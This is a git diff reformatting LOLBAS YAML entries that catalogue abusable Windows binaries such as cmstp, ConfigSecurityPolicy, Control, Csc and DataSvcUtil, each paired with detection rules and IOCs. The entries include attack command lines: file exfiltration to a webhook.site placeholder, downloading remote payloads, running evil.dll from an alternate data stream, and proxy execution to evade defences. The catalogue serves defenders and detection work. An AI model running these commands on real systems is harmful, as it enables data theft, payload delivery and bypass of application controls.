Usecase: Execute code hidden within an inf file. Execute code directly from Internet. + Category: AWL Bypass + Privileges: User + MitreID: T1218.003 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - - Path: C:\Windows\System32\cmstp.exe - - Path: C:\Windows\SysWOW64\cmstp.exe +- Path: C:\Windows\System32\cmstp.exe +- Path: C:\Windows\SysWOW64\cmstp.exe Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml - - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - - IOC: Execution of cmstp.exe without a VPN use case is suspicious - - IOC: DotNet CLR libraries loaded into cmstp.exe - - IOC: DotNet CLR Usage Log - cmstp.exe.log +- Sigma: https://github.com/SigmaHQ/sigma/blob/6d0d58dfe240f7ef46e7da928c0b65223a46c3b2/rules/windows/process_creation/sysmon_cmstp_execution_by_creation.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_uac_cmstp.yml +- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml +- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml +- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml +- IOC: Execution of cmstp.exe without a VPN use case is suspicious +- IOC: DotNet CLR libraries loaded into cmstp.exe +- IOC: DotNet CLR Usage Log - cmstp.exe.log +- Splunk: https://research.splunk.com/endpoint/f87b5062-b405-11eb-a889-acde48001122/ Resources: - - Link: https://twitter.com/NickTyrer/status/958450014111633408 - - Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 - - Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e - - Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ - - Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 - - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp +- Link: https://twitter.com/NickTyrer/status/958450014111633408 +- Link: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 +- Link: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e +- Link: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ +- Link: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 +- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp Acknowledgement: - - Person: Oddvar Moe - Handle: '@oddvarmoe' - - Person: Nick Tyrer - Handle: '@NickTyrer' +- Person: Oddvar Moe + Handle: '@oddvarmoe' +- Person: Nick Tyrer + Handle: '@NickTyrer' diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index ae65d1d2..1c0d8f97 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -1,41 +1,47 @@ ---- Name: ConfigSecurityPolicy.exe -Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. +Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. + you can configure different pilot collections for each of the co-management workloads. + Being able to use different pilot collections allows you to take a more granular + approach when shifting workloads. Author: Ialle Teixeira Created: 2020-09-04 Commands: - - Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile - Description: Upload file, credentials or data exfiltration in general - Usecase: Upload file - Category: Upload - Privileges: User - MitreID: T1567 - OperatingSystem: Windows 10 - - Command: ConfigSecurityPolicy.exe https://example.com/payload - Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) - Usecase: Downloads payload from remote server - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 10, Windows 11 +- Command: ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile + Description: Upload file, credentials or data exfiltration in general + Usecase: Upload file + Category: Upload + Privileges: User + MitreID: T1567 + OperatingSystem: Windows 10 +- Command: ConfigSecurityPolicy.exe https://example.com/payload + Description: It will download a remote payload and place it in the cache folder + (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) + Usecase: Downloads payload from remote server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 Full_Path: - - Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe - - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe +- Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe +- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/5e57e476c29980800dcc88a7a001ddb75d21a58b/rules/windows/process_creation/win_pc_lolbas_configsecuritypolicy.yml - - IOC: ConfigSecurityPolicy storing data into alternate data streams. - - IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. - - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. - - IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" +- Sigma: https://github.com/SigmaHQ/sigma/blob/5e57e476c29980800dcc88a7a001ddb75d21a58b/rules/windows/process_creation/win_pc_lolbas_configsecuritypolicy.yml +- IOC: ConfigSecurityPolicy storing data into alternate data streams. +- IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network + IPS/IDS. +- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching + ConfigSecurityPolicy.exe. +- IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; + .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)" Resources: - - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads - - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads - - Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor - - Link: https://twitter.com/NtSetDefault/status/1302589153570365440?s=20 +- Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads +- Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads +- Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor +- Link: https://twitter.com/NtSetDefault/status/1302589153570365440?s=20 Acknowledgement: - - Person: Ialle Teixeira - Handle: '@NtSetDefault' - - Person: Nir Chako (Pentera) - Handle: '@C_h4ck_0' +- Person: Ialle Teixeira + Handle: '@NtSetDefault' +- Person: Nir Chako (Pentera) + Handle: '@C_h4ck_0' diff --git a/yml/OSBinaries/Conhost.yml b/yml/OSBinaries/Conhost.yml index cc27bc76..bc18c854 100644 --- a/yml/OSBinaries/Conhost.yml +++ b/yml/OSBinaries/Conhost.yml @@ -1,26 +1,25 @@ ---- Name: Conhost.exe Description: Console Window host Author: Wietze Beukema Created: 2022-04-05 Commands: - - Command: "conhost.exe calc.exe" - Description: Execute calc.exe with conhost.exe as parent process - Usecase: Use conhost.exe as a proxy binary to evade defensive counter-measures - Category: Execute - Privileges: User - MitreID: T1202 - OperatingSystem: Windows 10, Windows 11 +- Command: conhost.exe calc.exe + Description: Execute calc.exe with conhost.exe as parent process + Usecase: Use conhost.exe as a proxy binary to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1202 + OperatingSystem: Windows 10, Windows 11 Full_Path: - - Path: c:\windows\system32\conhost.exe +- Path: c:\windows\system32\conhost.exe Detection: - - IOC: conhost.exe spawning unexpected processes - - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_susp_conhost.yml +- IOC: conhost.exe spawning unexpected processes +- Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_susp_conhost.yml Resources: - - Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ - - Link: https://twitter.com/Wietze/status/1511397781159751680 +- Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ +- Link: https://twitter.com/Wietze/status/1511397781159751680 Acknowledgement: - - Person: Adam - Handle: '@hexacorn' - - Person: Wietze - Handle: '@wietze' +- Person: Adam + Handle: '@hexacorn' +- Person: Wietze + Handle: '@wietze' diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 75c857fb..5f467341 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -1,36 +1,38 @@ ---- Name: Control.exe Description: Binary used to launch controlpanel items in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: control.exe c:\windows\tasks\file.txt:evil.dll - Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). - Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism - Category: ADS - Privileges: User - MitreID: T1218.002 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: control.exe c:\windows\tasks\file.txt:evil.dll + Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence + mechanism + Category: ADS + Privileges: User + MitreID: T1218.002 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\control.exe - - Path: C:\Windows\SysWOW64\control.exe +- Path: C:\Windows\System32\control.exe +- Path: C:\Windows\SysWOW64\control.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml - - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - - Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - - IOC: Control.exe executing files from alternate data streams - - IOC: Control.exe executing library file without cpl extension - - IOC: Suspicious network connections from control.exe +- Sigma: https://github.com/SigmaHQ/sigma/blob/e8b633f54fce88e82b1c3d5e7c7bfa7d3d0beee7/rules/windows/process_creation/win_susp_control_cve_2021_40444.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_control_dll_load.yml +- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml +- Elastic: https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml +- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml +- IOC: Control.exe executing files from alternate data streams +- IOC: Control.exe executing library file without cpl extension +- IOC: Suspicious network connections from control.exe +- Splunk: https://research.splunk.com/endpoint/10423ac4-10c9-11ec-8dc4-acde48001122/ Resources: - - Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ - - Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ - - Link: https://twitter.com/bohops/status/955659561008017409 - - Link: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items - - Link: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ +- Link: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ +- Link: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ +- Link: https://twitter.com/bohops/status/955659561008017409 +- Link: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items +- Link: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ Acknowledgement: - - Person: Jimmy - Handle: '@bohops' +- Person: Jimmy + Handle: '@bohops' diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 733e7fba..e79b571f 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -1,36 +1,39 @@ ---- Name: Csc.exe Description: Binary file used by .NET to compile C# code -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: csc.exe -out:My.exe File.cs - Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. - Usecase: Compile attacker code on system. Bypass defensive counter measures. - Category: Compile - Privileges: User - MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: csc -target:library File.cs - Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to a dll file. - Usecase: Compile attacker code on system. Bypass defensive counter measures. - Category: Compile - Privileges: User - MitreID: T1127 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: csc.exe -out:My.exe File.cs + Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled + version to My.exe. + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 +- Command: csc -target:library File.cs + Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled + version to a dll file. + Usecase: Compile attacker code on system. Bypass defensive counter measures. + Category: Compile + Privileges: User + MitreID: T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe +- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml - - IOC: Csc.exe should normally not run as System account unless it is used for development. +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml +- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml +- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml +- IOC: Csc.exe should normally not run as System account unless it is used for development. Resources: - - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe +- Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe Acknowledgement: - - Person: - Handle: +- Person: null + Handle: null diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 1c5bbb14..ffcec696 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml @@ -1,35 +1,29 @@ ---- Name: Cscript.exe Description: Binary used to execute scripts in Windows -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: cscript //e:vbscript c:\ads\file.txt:script.vbs - Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). - Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism - Category: ADS - Privileges: User - MitreID: T1564.004 - OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +- Command: cscript //e:vbscript c:\ads\file.txt:script.vbs + Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate + Data Stream (ADS). + Usecase: Can be used to evade defensive countermeasures or to hide as a persistence + mechanism + Category: ADS + Privileges: User + MitreID: T1564.004 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows + 11 Full_Path: - - Path: C:\Windows\System32\cscript.exe - - Path: C:\Windows\SysWOW64\cscript.exe +- Path: C:\Windows\System32\cscript.exe +- Path: C:\Windows\SysWOW64\cscript.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Cscript.exe executing files from alternate data streams - - IOC: DotNet CLR libraries loaded into cscript.exe - - IOC: DotNet CLR Usage Log - cscript.exe.log +- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules +- Sigma: https://github.com/SigmaHQ/sigma/blob/960a03eaf480926ed8db464477335a713e9e6630/rules/windows/process_creation/win_pc_lobas_aspnet_compiler.yml Resources: - - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - - Person: Oddvar Moe - Handle: '@oddvarmoe' +- Person: Oddvar Moe + Handle: '@oddvarmoe' diff --git a/yml/OSBinaries/CustomShellHost.yml b/yml/OSBinaries/CustomShellHost.yml index 69d11cbf..ad0eec67 100644 --- a/yml/OSBinaries/CustomShellHost.yml +++ b/yml/OSBinaries/CustomShellHost.yml @@ -1,24 +1,25 @@ ---- Name: CustomShellHost.exe -Description: A host process that is used by custom shells when using Windows in Kiosk mode. -Author: 'Wietze Beukema' +Description: A host process that is used by custom shells when using Windows in Kiosk + mode. +Author: Wietze Beukema Created: 2021-11-14 Commands: - - Command: CustomShellHost.exe - Description: Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder. - Usecase: Can be used to evade defensive counter-measures - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows 10, Windows 11 +- Command: CustomShellHost.exe + Description: Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) + if present in the current working folder. + Usecase: Can be used to evade defensive counter-measures + Category: Execute + Privileges: User + MitreID: T1218 + OperatingSystem: Windows 10, Windows 11 Full_Path: - - Path: C:\Windows\System32\CustomShellHost.exe +- Path: C:\Windows\System32\CustomShellHost.exe Detection: - - IOC: CustomShellHost.exe is unlikely to run on normal workstations - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml +- IOC: CustomShellHost.exe is unlikely to run on normal workstations +- Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml Resources: - - Link: https://twitter.com/YoSignals/status/1381353520088113154 - - Link: https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher +- Link: https://twitter.com/YoSignals/status/1381353520088113154 +- Link: https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher Acknowledgement: - - Person: John Carroll - Handle: '@YoSignals' +- Person: John Carroll + Handle: '@YoSignals' diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml index a1f70416..e59a0657 100644 --- a/yml/OSBinaries/DataSvcUtil.yml +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -1,29 +1,31 @@ ---- Name: DataSvcUtil.exe -Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application. -Author: 'Ialle Teixeira' +Description: DataSvcUtil.exe is a command-line tool provided by WCF Data Services + that consumes an Open Data Protocol (OData) feed and generates the client data service + classes that are needed to access a data service from a .NET Framework client application. +Author: Ialle Teixeira Created: 2020-12-01 Commands: - - Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile - Description: Upload file, credentials or data exfiltration in general - Usecase: Upload file - Category: Upload - Privileges: User - MitreID: T1567 - OperatingSystem: Windows 10 +- Command: DataSvcUtil /out:C:\Windows\System32\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile + Description: Upload file, credentials or data exfiltration in general + Usecase: Upload file + Category: Upload + Privileges: User + MitreID: T1567 + OperatingSystem: Windows 10 Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe +- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe Code_Sample: - - Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 +- Code: https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/dc030e0128a38510b0a866e1210f5ebd7c418c0b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml - - IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. - - IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. - - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil. +- Sigma: https://github.com/SigmaHQ/sigma/blob/dc030e0128a38510b0a866e1210f5ebd7c418c0b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml +- IOC: The DataSvcUtil.exe tool is installed in the .NET Framework directory. +- IOC: Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS. +- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching + DataSvcUtil. Resources: - - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe - - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services - - Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services +- Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe +- Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services +- Link: https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services Acknowledgement: - - Person: Ialle Teixeira - Handle: '@NtSetDefault' +- Person: Ialle Teixeira + Handle: '@NtSetDefault' diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml index ece24dbd..72a3997d 100644 --- a/yml/OSBinaries/Desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -1,28 +1,28 @@ ---- Name: Desktopimgdownldr.exe Description: Windows binary used to configure lockscreen/desktop image Author: Gal Kristal Created: 2020-06-28 Commands: - - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr - Description: Downloads the file and sets it as the computer's lockscreen - Usecase: Download arbitrary files from a web server - Category: Download - Privileges: User - MitreID: T1105 - OperatingSystem: Windows 10, Windows 11 +- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext + /eventName:desktopimgdownldr + Description: Downloads the file and sets it as the computer's lockscreen + Usecase: Download arbitrary files from a web server + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 Full_Path: - - Path: c:\windows\system32\desktopimgdownldr.exe +- Path: c:\windows\system32\desktopimgdownldr.exe Code_Sample: - - Code: +- Code: null Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_desktopimgdownldr.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/win_susp_desktopimgdownldr_file.yml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml - - IOC: desktopimgdownldr.exe that creates non-image file - - IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_desktopimgdownldr.yml +- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/win_susp_desktopimgdownldr_file.yml +- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml +- IOC: desktopimgdownldr.exe that creates non-image file +- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl Resources: - - Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ +- Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/ Acknowledgement: - - Person: Gal Kristal - Handle: '@gal_kristal' +- Person: Gal Kristal + Handle: '@gal_kristal' diff --git a/yml/OSBinaries/DeviceCredentialDeployment.yml b/yml/OSBinaries/DeviceCredentialDeployment.yml index 019ea43a..078fa23c 100644 --- a/yml/OSBinaries/DeviceCredentialDeployment.yml +++ b/yml/OSBinaries/DeviceCredentialDeployment.yml @@ -1,21 +1,21 @@ ---- Name: DeviceCredentialDeployment.exe Description: Device Credential Deployment -Author: 'Elliot Killick' +Author: Elliot Killick Created: '2021-08-16' 